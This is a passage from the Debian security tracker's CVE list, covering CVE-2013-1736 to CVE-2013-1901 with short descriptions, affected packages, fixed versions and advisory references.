9.1.x before 9.1.9, 9.0.x before 9.0.1 ...) - postgresql-9.1 (installer related) - postgresql-8.4 (installer related) CVE-2013-1901 (PostgreSQL 9.2.x before 9.2.4 and 9.1.x before 9.1.9 does not properly ...) {DSA-2658-1} - postgresql-9.1 9.1.9-1 CVE-2013-1900 (PostgreSQL 9.2.x before 9.2.4, 9.1.x before 9.1.9, 9.0.x before 9.0.13 ...) {DSA-2658-1 DSA-2657-1} - postgresql-9.1 9.1.9-1 - postgresql-8.4 8.4.17-1 CVE-2013-1899 (Argument injection vulnerability in PostgreSQL 9.2.x before 9.2.4, 9.1 ...) {DSA-2658-1} - postgresql-9.1 9.1.9-1 (bug #704479) CVE-2013-1898 (lib/thumbshooter.rb in the Thumbshooter 0.1.5 gem for Ruby allows remo ...) NOT-FOR-US: Ruby gem Thumbshooter CVE-2013-1897 (The do_search function in ldap/servers/slapd/search.c in 389 Directory ...) - 389-ds-base 1.3.2.9-1 (bug #704421) NOTE: http://git.fedorahosted.org/cgit/389/ds.git/commit/?h=389-ds-base-1.2.11&id=5a18c828533a670e7143327893f8171a19062286 NOTE: https://fedorahosted.org/389/ticket/47308 CVE-2013-1896 (mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly de ...) - apache2 2.4.6-1 (low; bug #717272) [wheezy] - apache2 2.2.22-13+deb7u1 [squeeze] - apache2 2.2.16-6+squeeze12 NOTE: http://www.gossamer-threads.com/lists/apache/announce/427633 CVE-2013-1895 (The py-bcrypt module before 0.3 for Python does not properly handle co ...) - python-bcrypt 0.4-1 (bug #704030) [squeeze] - python-bcrypt (thread support only introduced after 0.1 release) NOTE: https://code.google.com/p/py-bcrypt/source/detail?r=b03cc5246ea21a839fd027da5616d8d470247558 CVE-2013-1894 REJECTED CVE-2013-1893 (SQL injection vulnerability in addressbookprovider.php in ownCloud Ser ...) - owncloud (only affecting 5.0 branch) CVE-2013-1892 (MongoDB before 2.0.9 and 2.2.x before 2.2.4 does not properly validate ...) - mongodb 1:2.4.1-1 (bug #704042) [wheezy] - mongodb 1:2.0.6-1.1 [squeeze] - mongodb (Minor isue, Spidermonkey in Lenny is EOLed) NOTE: https://www.openwall.com/lists/oss-security/2013/03/25/7 CVE-2013-1891 RESERVED CVE-2013-1890 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud Server ...) - owncloud (only affecting 5.0 branch) CVE-2013-1889 (mod_ruid2 before 0.9.8 improperly handles file descriptors which allow ...) - libapache2-mod-ruid2 0.9.8-1 (low; bug #704066) [wheezy] - libapache2-mod-ruid2 (Minor issue) NOTE: Fix: https://github.com/mind04/mod-ruid2/commit/1fed9dda70cd44d54301df19730a29ae0989e0a2 CVE-2013-1888 (pip before 1.3 allows local users to overwrite arbitrary files via a s ...) - python-pip [squeeze] - python-pip NOTE: https://github.com/pypa/pip/pull/780/files NOTE: Not-affected as vulnerable code only in 1.3, and 1.3.1-1 fixed the issue. CVE-2013-1887 (Multiple cross-site scripting (XSS) vulnerabilities in the Views modul ...) - drupal6 (only affects 7.x-3.x to 7.x-3.6) - drupal7 (views module not packaged) CVE-2013-1886 (Format string vulnerability in the token processing system (pki-tps) i ...) NOT-FOR-US: Red Hat Certificate System CVE-2013-1885 (Multiple cross-site scripting (XSS) vulnerabilities in the token proce ...) NOT-FOR-US: Red Hat Certificate System CVE-2013-1884 (The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through ...) - subversion 1.7.9-1 (bug #704940) [wheezy] - subversion (Subversion HTTPD servers 1.7.0 through 1.7.8 (inclusive)) [squeeze] - subversion (Subversion HTTPD servers 1.7.0 through 1.7.8 (inclusive)) NOTE: http://bugs.debian.org/704940#32 NOTE: http://subversion.apache.org/security/CVE-2013-1884-advisory.txt CVE-2013-1883 (Mantis Bug Tracker (aka MantisBT) 1.2.12 before 1.2.15 allows remote a ...) - mantis (only affects 1.2.12 to 1.2.14) NOTE: https://www.openwall.com/lists/oss-security/2013/03/21/3 CVE-2013-1882 RESERVED CVE-2013-1881 (GNOME libsvg before 2.39.0 allows remote attackers to read arbitrary f ...) - librsvg 2.40.0-1 (bug #724741) [wheezy] - librsvg 2.36.1-2 [squeeze] - librsvg 2.26.3-1+deb6u2 CVE-2013-1880 (Cross-site scripting (XSS) vulnerability in the Portfolio publisher se ...) - activemq (portfolio demo app not shipped in Debian package) NOTE: https://issues.apache.org/jira/browse/AMQ-4398 CVE-2013-1879 (Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache Ac ...) - activemq (scheduler not shipped in Debian package) NOTE: https://issues.apache.org/jira/browse/AMQ-4397 CVE-2013-1878 REJECTED CVE-2013-1877 REJECTED CVE-2013-1876 REJECTED CVE-2013-1875 (command_wrap.rb in the command_wrap Gem for Ruby allows remote attacke ...) NOT-FOR-US: ruby gem command_wrap CVE-2013-1874 (Untrusted search path vulnerability in csi in Chicken before 4.8.2 all ...) - chicken 4.8.0.3-1 (low; bug #702410) [squeeze] - chicken (Minor issue) [wheezy] - chicken (Minor issue) NOTE: https://www.openwall.com/lists/oss-security/2013/03/19/11 CVE-2013-1873 [linux kernel kernel stack memory disclosure] REJECTED CVE-2013-1872 (The Intel drivers in Mesa 8.0.x and 9.0.x allow context-dependent atta ...) {DSA-2704-1} - mesa 8.0.5-7 [squeeze] - mesa (Vulnerable code not present) CVE-2013-1871 (Cross-site scripting (XSS) vulnerability in account/EditAddress.do in ...) NOT-FOR-US: Red Hat Satellite CVE-2013-1870 REJECTED CVE-2013-1869 (CRLF injection vulnerability in spacewalk-java before 2.1.148-1 and Re ...) NOT-FOR-US: Red Hat Satellite CVE-2013-1868 (Multiple buffer overflows in VideoLAN VLC media player 2.0.4 and earli ...) {DSA-2973-1} - vlc 2.0.5-1 [squeeze] - vlc (Unsupported in squeeze-lts) NOTE: http://www.videolan.org/security/sa1301.html NOTE: The freetype issue is a harmless NULL deref and won't be fixed CVE-2013-1867 (Gemalto Tokend 2013 has an Arbitrary File Creation/Overwrite Vulnerabi ...) NOT-FOR-US: Gemalto Tokend CVE-2013-1866 (OpenSC OpenSC.tokend has an Arbitrary File Creation/Overwrite Vulnerab ...) NOT-FOR-US: OpenSC.tokend (different from src:opensc) CVE-2013-1865 (OpenStack Keystone Folsom (2012.2) does not properly perform revocatio ...) - keystone (only affects folsom) NOTE: fixed in experimental with keystone/2012.2.3-2 CVE-2013-1864 (The Portable Tool Library (aka PTLib) before 2.10.10, as used in Ekiga ...) NOTE: https://www.openwall.com/lists/oss-security/2013/03/15/6 - ekiga 4.0.1-1 (low; bug #704133) [wheezy] - ekiga (Minor issue) [squeeze] - ekiga (Minor issue) CVE-2013-1863 (Samba 4.x before 4.0.4, when configured as an Active Directory domain ...) - samba4 (Debian package only uses ntvfs, see #679678) NOTE: http://www.samba.org/samba/history/samba-4.0.4.html NOTE: http://www.samba.org/samba/security/CVE-2013-1863 CVE-2013-1862 (mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2. ...) - apache2 2.4.1-1 (unimportant) [wheezy] - apache2 2.2.22-13+deb7u1 [squeeze] - apache2 2.2.16-6+squeeze12 NOTE: Such injection issues are not treated as security issues CVE-2013-1861 (MariaDB 5.5.x before 5.5.30, 5.3.x before 5.3.13, 5.2.x before 5.2.15, ...) {DSA-2818-1 DSA-2780-1} - mariadb-5.5 (Fixed before initial upload to archive) - mariadb-10.0 (Fixed before initial upload) - mysql-5.5 5.5.33+dfsg-1 (low; bug #706715) - mysql-5.1 (low; bug #706715) NOTE: https://mariadb.atlassian.net/browse/MDEV-4252 CVE-2013-1860 (Heap-based buffer overflow in the wdm_in_callback function in drivers/ ...) {DSA-2668-1} - linux 3.2.41-1 - linux-2.6 CVE-2013-1859 (The Node Parameter Control module 6.x-1.x for Drupal does not properly ...) NOT-FOR-US: Drupal module Node Parameter Control CVE-2013-1858 (The clone system-call implementation in the Linux kernel before 3.8.3 ...) - linux (Only exploitable starting with 3.7) - linux-2.6 (Only exploitable starting with 3.7) NOTE: http://stealth.openwall.net/xSports/clown-newuser.c CVE-2013-1857 (The sanitize helper in lib/action_controller/vendor/html-scanner/html/ ...) {DSA-2655-1} - ruby-actionpack-3.2 3.2.6-6 (bug #703349) - ruby-actionpack-2.3 2.3.14-5 - rails 2.3.14.1 NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-1856 (The ActiveSupport::XmlMini_JDOM backend in lib/active_support/xml_mini ...) - ruby-activesupport-2.3 (Only affects 3.x and later) - ruby-activesupport-3.2 3.2.6-6 (bug #703350) - rails (Only affects 3.x and later) NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-1855 (The sanitize_css method in lib/action_controller/vendor/html-scanner/h ...) {DSA-2655-1} - ruby-actionpack-3.2 3.2.6-6 (bug #703349) - ruby-actionpack-2.3 2.3.14-5 - rails 2.3.14.1 NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-1854 (The Active Record component in Ruby on Rails 2.3.x before 2.3.18, 3.1. ...) {DSA-2655-1} - ruby-activerecord-3.2 3.2.6-5 (bug #703348) - ruby-activerecord-2.3 2.3.14-6 - ruby-activesupport-2.3 2.3.14-7 - rails 2.3.14.1 NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-1853 (Almanah Diary 0.9.0 and 0.10.0 does not encrypt the database when clos ...) - almanah 0.9.1-1 (bug #702905) [squeeze] - almanah (Only affect Almanah used in combination with glib 2.32) NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=695117 CVE-2013-1852 (SQL injection vulnerability in leaguemanager.php in the LeagueManager ...) NOT-FOR-US: WordPress plugin LeagueManager CVE-2013-1851 (Incomplete blacklist vulnerability in lib/migrate.php in ownCloud befo ...) - owncloud 4.0.8debian-1.6 (bug #703094) NOTE: https://owncloud.org/about/security/advisories/oC-SA-2013-010/ NOTE: https://www.openwall.com/lists/oss-security/2013/03/14/8 CVE-2013-1850 (Multiple incomplete blacklist vulnerabilities in (1) import.php and (2 ...) - owncloud 4.0.8debian-1.6 (bug #703094) NOTE: https://owncloud.org/about/security/advisories/oC-SA-2013-009/ NOTE: https://www.openwall.com/lists/oss-security/2013/03/14/8 CVE-2013-1849 (The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through ...) {DLA-207-1} - subversion 1.7.9-1 (bug #704940) [squeeze] - subversion (Minor issue) [wheezy] - subversion 1.6.17dfsg-4+deb7u2 NOTE: http://seclists.org/fulldisclosure/2013/Mar/56 CVE-2013-1848 (fs/ext3/super.c in the Linux kernel before 3.8.4 uses incorrect argume ...) - linux 3.2.41-1 - linux-2.6 [squeeze] - linux-2.6 (Introduced in 2.6.33) NOTE: https://www.openwall.com/lists/oss-security/2013/03/20/8 CVE-2013-1847 (The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through ...) {DLA-207-1} - subversion 1.7.9-1 (bug #704940) [squeeze] - subversion (Minor issue) [wheezy] - subversion 1.6.17dfsg-4+deb7u2 NOTE: http://subversion.apache.org/security/CVE-2013-1847-advisory.txt CVE-2013-1846 (The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before ...) {DLA-207-1} - subversion 1.7.9-1 (bug #704940) [squeeze] - subversion (Minor issue) [wheezy] - subversion 1.6.17dfsg-4+deb7u2 NOTE: http://subversion.apache.org/security/CVE-2013-1846-advisory.txt CVE-2013-1845 (The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before ...) {DLA-207-1} - subversion 1.7.9-1 (bug #704940) [squeeze] - subversion (Minor issue) [wheezy] - subversion 1.6.17dfsg-4+deb7u2 NOTE: http://subversion.apache.org/security/CVE-2013-1845-advisory.txt CVE-2013-1844 (Cross-site scripting (XSS) vulnerability in Piwik before 1.11 allows r ...) - piwik (bug #506933) CVE-2013-1843 (Open redirect vulnerability in the Access tracking mechanism in TYPO3 ...) {DSA-2646-1} - typo3-src 4.5.19+dfsg1-5 (bug #702574) CVE-2013-1842 (SQL injection vulnerability in the Extbase Framework in TYPO3 4.5.x be ...) {DSA-2646-1} - typo3-src 4.5.19+dfsg1-5 (bug #702574) CVE-2013-1841 (Net-Server, when the reverse-lookups option is enabled, does not check ...) - libnet-server-perl (low; bug #702914) [bullseye] - libnet-server-perl (Minor issue) [buster] - libnet-server-perl (Minor issue) [stretch] - libnet-server-perl (Minor issue) [jessie] - libnet-server-perl (Minor issue) [wheezy] - libnet-server-perl (Minor issue) [squeeze] - libnet-server-perl (Minor issue) NOTE: https://rt.cpan.org/Ticket/Display.html?id=83909 CVE-2013-1840 (The v1 API in OpenStack Glance Essex (2012.1), Folsom (2012.2), and Gr ...) - glance 2012.1.1-5 (bug #703063) CVE-2013-1839 (The strHdrAcptLangGetItem function in errorpage.cc in Squid 3.2.x befo ...) - squid3 (the errors were introduced in trunk rev.11496 in 3.2.0.9) NOTE: According to http://seclists.org/bugtraq/2013/Mar/68 not affecting 3.1? NOTE: http://bazaar.launchpad.net/~squid/squid/3.2/revision/11796 CVE-2013-1838 (OpenStack Compute (Nova) Grizzly, Folsom (2012.2), and Essex (2012.1) ...) - nova 2012.1.1-15 (bug #703064) CVE-2013-1837 RESERVED CVE-2013-1836 (Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and ...) - moodle 2.5-1 (bug #703870) [squeeze] - moodle (Vulnerable code not present) CVE-2013-1835 (Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and ...) - moodle 2.5-1 (bug #703870) [squeeze] - moodle (Vulnerable code not present) CVE-2013-1834 (notes/edit.php in Moodle 1.9.x through 1.9.19, 2.x through 2.1.10, 2.2 ...) - moodle 2.5-1 (low; bug #703870) [squeeze] - moodle (Minor issue) CVE-2013-1833 (Multiple cross-site scripting (XSS) vulnerabilities in the File Picker ...) - moodle 2.5-1 (bug #703870) [squeeze] - moodle (Vulnerable code not present) CVE-2013-1832 (repository/webdav/lib.php in Moodle 2.x through 2.1.10, 2.2.x before 2 ...) - moodle 2.5-1 (bug #703870) [squeeze] - moodle (Vulnerable code not present) CVE-2013-1831 (lib/setuplib.php in Moodle through 2.1.10, 2.2.x before 2.2.8, 2.3.x b ...) - moodle 2.5-1 (low; bug #703870) [squeeze] - moodle (Minor issue) CVE-2013-1830 (user/view.php in Moodle through 2.1.10, 2.2.x before 2.2.8, 2.3.x befo ...) - moodle 2.5-1 (low; bug #703870) [squeeze] - moodle (Minor issue) CVE-2013-1829 (calendar/managesubscriptions.php in Moodle 2.4.x before 2.4.2 does not ...) - moodle (Only in 2.4 to 2.4.1) CVE-2013-1828 (The sctp_getsockopt_assoc_stats function in net/sctp/socket.c in the L ...) - linux (Introduced in 3.8) - linux-2.6 (Introduced in 3.8) CVE-2013-1827 (net/dccp/ccid.h in the Linux kernel before 3.5.4 allows local users to ...) - linux 3.2.29-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-47 CVE-2013-1826 (The xfrm_state_netlink function in net/xfrm/xfrm_user.c in the Linux k ...) {DSA-2668-1} - linux 3.2.32-1 (low) - linux-2.6 (low) NOTE: Probably gone since 3.2.32-1, but I checked 3.2.41-2 CVE-2013-1825 REJECTED CVE-2013-1824 (The SOAP parser in PHP before 5.3.22 and 5.4.x before 5.4.12 allows re ...) {DSA-2639-1} - php5 5.4.4-14 NOTE: See CVE-2013-1643 NOTE: https://git.php.net/?p=web/php.git;a=commitdiff;h=e8432b34ee7a196a14a6e0191a00fe73b5a095e7 CVE-2013-1823 (Cross-site scripting (XSS) vulnerability in the Notifications form in ...) NOT-FOR-US: Katello CVE-2013-1822 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud 4.5.x ...) - owncloud (owncloud stable4 (4.0.x) is not affected) NOTE: https://owncloud.org/about/security/advisories/oC-SA-2013-008/ NOTE: https://www.openwall.com/lists/oss-security/2013/03/14/8 CVE-2013-1821 (lib/rexml/text.rb in the REXML parser in Ruby before 1.9.3-p392 allows ...) {DSA-2809-1 DSA-2738-1} - ruby1.9.1 1.9.3.194-8.1 (bug #702525) - ruby1.8 1.8.7.358-7 (bug #702526) NOTE: http://www.ruby-lang.org/en/news/2013/02/22/rexml-dos-2013-02-22/ CVE-2013-1820 (tuned before 2.x allows local users to kill running processes due to i ...) - tuned (Fixed before initial release to Debian) CVE-2013-1819 (The _xfs_buf_find function in fs/xfs/xfs_buf.c in the Linux kernel bef ...) - linux 3.8-1 - linux-2.6 (low) [squeeze] - linux-2.6 (Too risky to backport, minor impact) [wheezy] - linux (Too risky to backport, minor impact) CVE-2013-1818 (maintenance/mwdoc-filter.php in MediaWiki before 1.20.3 allows remote ...) - mediawiki (mwdoc-filter.php introduced in 1.20) NOTE: register_globals is not supported in Debian anyway, see PHP's README.Debian.security CVE-2013-1817 (MediaWiki before 1.19.4 and 1.20.x before 1.20.3 contains an error in ...) - mediawiki 1:1.19.4-1 (bug #702305) [squeeze] - mediawiki CVE-2013-1816 (MediaWiki before 1.19.4 and 1.20.x before 1.20.3 allows remote attacke ...) - mediawiki 1:1.19.4-1 [squeeze] - mediawiki CVE-2013-1815 (PackStack 2012.2.3 in Red Hat OpenStack Essex and Folsom can create th ...) NOT-FOR-US: OpenStack PackStack CVE-2013-1814 (The users/get program in the User RPC API in Apache Rave 0.11 through ...) NOT-FOR-US: Apache Rave CVE-2013-1813 (util-linux/mdev.c in BusyBox before 1.21.0 uses 0777 permissions for p ...) - busybox 1:1.20.0-8 (low; bug #701965) [wheezy] - busybox (Minor issue) [squeeze] - busybox (Minor issue) CVE-2013-1812 (The ruby-openid gem before 2.2.2 for Ruby allows remote OpenID provide ...) - ruby-openid 2.1.8debian-6 (bug #702217) - libopenid-ruby (bug #702217) [squeeze] - libopenid-ruby 2.1.8debian-1+squeeze1 CVE-2013-1811 (An access control issue in MantisBT before 1.2.13 allows users with "R ...) {DSA-3120-1} - mantis (low; bug #698481) [squeeze] - mantis (Unsupported in squeeze-lts) CVE-2013-1810 (Multiple cross-site scripting (XSS) vulnerabilities in core/summary_ap ...) - mantis (only affects MantisBT 1.2.12) CVE-2013-1809 (Gambas before 3.4.0 allows remote attackers to move or manipulate dire ...) - gambas3 3.5.1-1 (low; bug #702184) - gambas2 [wheezy] - gambas3 (Minor issue) [squeeze] - gambas2 (Minor issue) NOTE: https://code.google.com/p/gambas/issues/detail?id=365 CVE-2013-1808 (Cross-site scripting (XSS) vulnerability in ZeroClipboard.swf and Zero ...) - db4o (unimportant) - jenkins 1.509.2+dfsg-1 (bug #706725) CVE-2013-1807 (PHP-Fusion before 7.02.06 stores backup files with predictable filenam ...) NOT-FOR-US: PHP-Fusion CVE-2013-1806 (Multiple directory traversal vulnerabilities in PHP-Fusion before 7.02 ...) NOT-FOR-US: PHP-Fusion CVE-2013-1805 REJECTED CVE-2013-1804 (Multiple cross-site scripting (XSS) vulnerabilities in PHP-Fusion befo ...) NOT-FOR-US: PHP-Fusion CVE-2013-1803 (Multiple SQL injection vulnerabilities in PHP-Fusion before 7.02.06 al ...) NOT-FOR-US: PHP-Fusion CVE-2013-1802 (The extlib gem 0.9.15 and earlier for Ruby does not properly restrict ...) {DLA-172-1} - ruby-extlib 0.9.15-3 (bug #697895) - libextlib-ruby (bug #697895) CVE-2013-1801 (The httparty gem 0.9.0 and earlier for Ruby does not properly restrict ...) NOT-FOR-US: httparty Ruby gem CVE-2013-1800 (The crack gem 0.3.1 and earlier for Ruby does not properly restrict ca ...) - ruby-crack 0.3.2-1 CVE-2013-1799 (Gnome Online Accounts (GOA) 3.6.x before 3.6.3 and 3.7.x before 3.7.91 ...) - gnome-online-accounts (Incomplete patch wasn't applied in Debian) CVE-2013-1798 (The ioapic_read_indirect function in virt/kvm/ioapic.c in the Linux ke ...) {DSA-2668-1} - linux 3.2.41-2 - linux-2.6 NOTE: https://www.openwall.com/lists/oss-security/2013/03/20/9 CVE-2013-1797 (Use-after-free vulnerability in arch/x86/kvm/x86.c in the Linux kernel ...) - linux 3.2.41-2 - linux-2.6 [squeeze] - linux-2.6 (Too intrusive to backport, KVM server not supported in squeeze-lts) NOTE: https://www.openwall.com/lists/oss-security/2013/03/20/9 CVE-2013-1796 (The kvm_set_msr_common function in arch/x86/kvm/x86.c in the Linux ker ...) {DSA-2669-1 DSA-2668-1} - linux 3.2.41-2 - linux-2.6 NOTE: https://www.openwall.com/lists/oss-security/2013/03/20/9 CVE-2013-1795 (Integer overflow in ptserver in OpenAFS before 1.6.2 allows remote att ...) {DSA-2638-1} - openafs 1.6.1-3 CVE-2013-1794 (Buffer overflow in certain client utilities in OpenAFS before 1.6.2 al ...) {DSA-2638-1} - openafs 1.6.1-3 CVE-2013-1793 (openstack-utils openstack-db has insecure password creation ...) NOT-FOR-US: openstack-utils CVE-2013-1792 (Race condition in the install_user_keyrings function in security/keys/ ...) {DSA-2668-1} - linux 3.2.41-1 - linux-2.6 CVE-2013-1791 RESERVED CVE-2013-1790 (poppler/Stream.cc in poppler before 0.22.1 allows context-dependent at ...) {DSA-2719-1} - poppler 0.18.4-6 (low; bug #702071) CVE-2013-1789 (splash/Splash.cc in poppler before 0.22.1 allows context-dependent att ...) - poppler (vulnerable code introduced in a later version) CVE-2013-1788 (poppler before 0.22.1 allows context-dependent attackers to cause a de ...) {DSA-2719-1} - poppler 0.18.4-6 (low; bug #702071) CVE-2013-1787 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...) NOT-FOR-US: Drupal addon CVE-2013-1786 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...) NOT-FOR-US: Drupal addon CVE-2013-1785 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...) NOT-FOR-US: Drupal addon CVE-2013-1784 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...) NOT-FOR-US: Drupal addon CVE-2013-1783 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in pag ...) NOT-FOR-US: Drupal addon CVE-2013-1782 (Cross-site scripting (XSS) vulnerability in the Responsive Blog Theme ...) NOT-FOR-US: Drupal addon CVE-2013-1781 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...) NOT-FOR-US: Drupal addon CVE-2013-1780 (Cross-site scripting (XSS) vulnerability in the Best Responsive Theme ...) NOT-FOR-US: Drupal addon CVE-2013-1779 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...) NOT-FOR-US: Drupal addon CVE-2013-1778 (Cross-site scripting (XSS) vulnerability in the Creative Theme 7.x-1.x ...) NOT-FOR-US: Drupal addon CVE-2013-1777 (The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as ...) NOT-FOR-US: JMX componenent of Apache Geronimo is not packaged CVE-2013-1776 (sudo 1.3.5 through 1.7.10 and 1.8.0 through 1.8.5, when the tty_ticket ...) {DSA-2642-1} - sudo 1.8.5p2-1+nmu1 (bug #701839) CVE-2013-1775 (sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through 1.8.6p6 allows loca ...) {DSA-2642-1} - sudo 1.8.5p2-1+nmu1 (bug #701838) NOTE: severity depends a lot on the environment CVE-2013-1774 (The chase_port function in drivers/usb/serial/io_ti.c in the Linux ker ...) {DSA-2668-1} - linux 3.2.38-1 - linux-2.6 CVE-2013-1773 (Buffer overflow in the VFAT filesystem implementation in the Linux ker ...) {DSA-2668-1} - linux 3.2.15-1 - linux-2.6 NOTE: Probably gone since 3.2.15-1, but I checked 3.2.41-2 CVE-2013-1772 (The log_prefix function in kernel/printk.c in the Linux kernel 3.x bef ...) - linux 3.2.39-1 - linux-2.6 (Vulnerability exposed since 3.0) CVE-2013-1771 (The web server Monkeyd produces a world-readable log (/var/log/monkeyd ...) - monkey (low) [squeeze] - monkey (Minor issue) NOTE: https://www.openwall.com/lists/oss-security/2013/02/24/5 CVE-2013-1770 (Cross-site scripting (XSS) vulnerability in views_view.php in Ganglia ...) - ganglia 3.6.0-1 (low; bug #700158) [squeeze] - ganglia (Minor issue) [wheezy] - ganglia (Minor issue) - ganglia-web 3.5.8-3 (bug #700159) NOTE: starting with 3.6.0-1 the web front is no longer built from src:ganglia so marking this version as fixed NOTE: Upstream non-verified fix https://github.com/ganglia/ganglia-web/commit/552965f33bf79d41ccbec3f1f26840c8bab54ad6 CVE-2013-1769 (A certain hashing algorithm in Telepathy Gabble 0.16.x before 0.16.5 a ...) - telepathy-gabble 0.16.5-1 (low; bug #702252) [squeeze] - telepathy-gabble (Minor issue) CVE-2013-1768 (The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and ...) - openjpa 2.2.2-1 (bug #716937) [squeeze] - openjpa (Minor issue) [wheezy] - openjpa (Minor issue) CVE-2013-1767 (Use-after-free vulnerability in the shmem_remount_fs function in mm/sh ...) {DSA-2668-1} - linux 3.2.41-1 - linux-2.6 CVE-2013-1766 (libvirt 1.0.2 and earlier sets the group owner to kvm for device files ...) {DSA-2650-1} - libvirt 0.9.12-8 (bug #701649) CVE-2013-1765 (Multiple cross-site scripting (XSS) vulnerabilities in jwplayer.swf in ...) NOT-FOR-US: WordPress plugin smart-flv CVE-2013-1764 (The Zypper (aka zypp) backend in PackageKit before 0.8.8 allows local ...) - packagekit (Zypp backend specific to SuSE) CVE-2013-1763 (Array index error in the __sock_diag_rcv_msg function in net/core/sock ...) - linux (Introduced in 3.3) NOTE: 3.6.9 and 3.7.8 in experimental are affected, 3.8 will be fixed. CVE-2013-1762 (stunnel 4.21 through 4.54, when CONNECT protocol negotiation and NTLM ...) {DSA-2664-1} - stunnel4 3:4.53-1.1 (bug #702267) CVE-2013-1761 RESERVED CVE-2013-1760 (The Bug Genie before 3.2.6 has Multiple XSS and HTML Injection Vulnera ...) NOT-FOR-US: Bug Genie CVE-2013-1759 (Cross-site scripting (XSS) vulnerability in the Responsive Logo Slides ...) NOT-FOR-US: WordPress plugin responsive-logo-slideshow CVE-2013-1758 (Cross-site scripting (XSS) vulnerability in the Marekkis Watermark plu ...) NOT-FOR-US: WordPress plugin marekkis-watermark CVE-2013-1757 RESERVED CVE-2013-1756 (The Dragonfly gem 0.7 before 0.8.6 and 0.9.x before 0.9.13 for Ruby, w ...) NOT-FOR-US: Dragonfly Ruby gem CVE-2013-1755 RESERVED CVE-2013-1754 RESERVED CVE-2013-1753 (The gzip_decode function in the xmlrpc client library in Python 3.4 an ...) - python2.5 (low) - python2.6 (low) - python2.7 2.7.9-1 (low; bug #742929) - python3.1 (low) - python3.2 (low) - python3.3 (low; bug #742928) - python3.4 3.4.2-4 (low; bug #742927) [jessie] - python3.4 (Minor issue) [squeeze] - python2.5 (Minor issue) [squeeze] - python2.6 (Minor issue) [wheezy] - python2.6 (Minor issue) [wheezy] - python2.7 (Minor issue) [squeeze] - python3.1 (Minor issue) [wheezy] - python3.2 (Minor issue) NOTE: http://bugs.python.org/issue16043 NOTE: https://github.com/python/cpython/commit/eca72d47f5a639a0ac66a98a2d63b30df2ce310f (3.4) CVE-2013-1752 REJECTED CVE-2013-1751 (TWiki before 5.1.4 allows remote attackers to execute arbitrary shell ...) - twiki NOTE: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2013-1751 CVE-2013-1750 (Heap-based buffer overflow in RealNetworks RealPlayer before 16.0.1.18 ...) NOT-FOR-US: RealPlayer CVE-2013-1749 (Cross-site scripting (XSS) vulnerability in edit.php in PHP Address Bo ...) NOT-FOR-US: PHP Address Book CVE-2013-1748 (Multiple SQL injection vulnerabilities in PHP Address Book 8.2.5 allow ...) NOT-FOR-US: PHP Address Book CVE-2013-1747 (channel.c in ngIRCd 20 and 20.1 allows remote attackers to cause a den ...) - ngircd (Vulnerable version was only in experimental, introduced in 20.1-1~exp1 and fixed in 20.2-1~exp1) CVE-2013-1746 RESERVED CVE-2013-1745 RESERVED CVE-2013-1744 (IRIS citations management tool through 1.3 allows remote attackers to ...) NOT-FOR-US: IRIS citations management tool CVE-2013-1743 (Multiple cross-site scripting (XSS) vulnerabilities in report.cgi in B ...) - bugzilla (Only affects 4.1 to 4.4) - bugzilla4 (bug #669643) NOTE: https://bugzilla.mozilla.org/show_bug.cgi?id=924932 CVE-2013-1742 (Multiple cross-site scripting (XSS) vulnerabilities in editflagtypes.c ...) - bugzilla (low) [squeeze] - bugzilla (Minor issue) - bugzilla4 (bug #669643) NOTE: https://bugzilla.mozilla.org/show_bug.cgi?id=924802 CVE-2013-1741 (Integer overflow in Mozilla Network Security Services (NSS) 3.15 befor ...) {DSA-2994-1 DLA-23-1} - nss 2:3.15.3-1 (bug #735105) [squeeze] - nss 3.12.8-1+squeeze8 NOTE: https://hg.mozilla.org/projects/nss/rev/612d7d1eb9e7 CVE-2013-1740 (The ssl_Do1stHandshake function in sslsecur.c in libssl in Mozilla Net ...) - nss 2:3.15.4-1 [squeeze] - nss (false start disabled by default, needs to be enabled by clients) [wheezy] - nss (false start disabled by default, needs to be enabled by clients) NOTE: false start must be enabled by the client (mainly browsers) CVE-2013-1739 (Mozilla Network Security Services (NSS) before 3.15.2 does not ensure ...) {DSA-2790-1} - nss 2:3.15.2-1 (bug #726473) [squeeze] - nss (Introduced in 3.14.3) NOTE: https://developer.mozilla.org/en-US/docs/NSS/NSS_3.15.2_release_notes NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=1012656 CVE-2013-1738 (Use-after-free vulnerability in the JS_GetGlobalForScopeChain function ...) - iceweasel 24.0-1 [wheezy] - iceweasel (Only affects Firefox > 17) [squeeze] - iceweasel - icedove (Only affects Firefox > 17) - iceape (Only affects Firefox > 17) CVE-2013-1737 (Mozilla Firefox before 24.0, Firefox ESR 17.x before 17.0.9, Thunderbi ...) {DSA-2762-1 DSA-2759-1} - iceweasel 24.0-1 [squeeze] - iceweasel - icedove 17.0.9-1 [squeeze] - icedove CVE-2013-1736 (The nsGfxScrollFrameInner::IsLTR function in Mozilla Firefox before 24 